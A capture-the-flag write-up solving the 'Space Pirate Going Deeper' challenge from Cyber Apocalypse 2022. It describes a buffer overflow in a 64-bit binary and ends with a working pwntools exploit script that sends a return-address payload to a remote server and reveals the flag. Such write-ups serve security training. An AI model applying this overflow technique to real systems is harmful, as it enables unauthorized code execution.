Cyber Apocalypse 2022

Space Pirate Going Deeper

Solved by: Taz34

Here we have a 64 bit binary which takes input as follows:

After playing around with the binary i came across a Segmentation fault, hence we have a buffer overflow exploit here.

So I found the offset to be 50.

Now to understand the working of the binary I opened the binary in Cutter https://cutter.re/

Here we came across the main function and another interesting function named admin_panel In the admin_panel function we came across an if statement:

From here we can understand that, if we want to print the flag i.e. system("cat flag"); we need to make the if condition false.

So now we can create the payload

payload = b'A'*offset + ret_addr_main + ret_addr_admin_panel + if_arg1 + if_arg3 + if_arg3
payload = b'A'*50 + p64(0x400b9a) + p64(0x400b46) +p64(0xdeadbeef) + p64(0x1337c0de) + p64(0x1337beef)

Now we have our payload set, hence the final script:

from pwn import *
#elf = ELF('./sp_going_deeper')
#p = elf.process()
p = remote("138.68.161.126", 31239) 

payload = b'A'*50 + p64(0x400b9a) + p64(0x400b46) +p64(0xdeadbeef) + p64(0x1337c0de) + p64(0x1337beef)

p.sendline('1')
p.sendline(payload)
p.interactive()

And here the flag is dumped.

Flag: HTB{no_n33d_2_ch4ng3_m3ch5_wh3n_u_h4v3_flow_r3d1r3ct}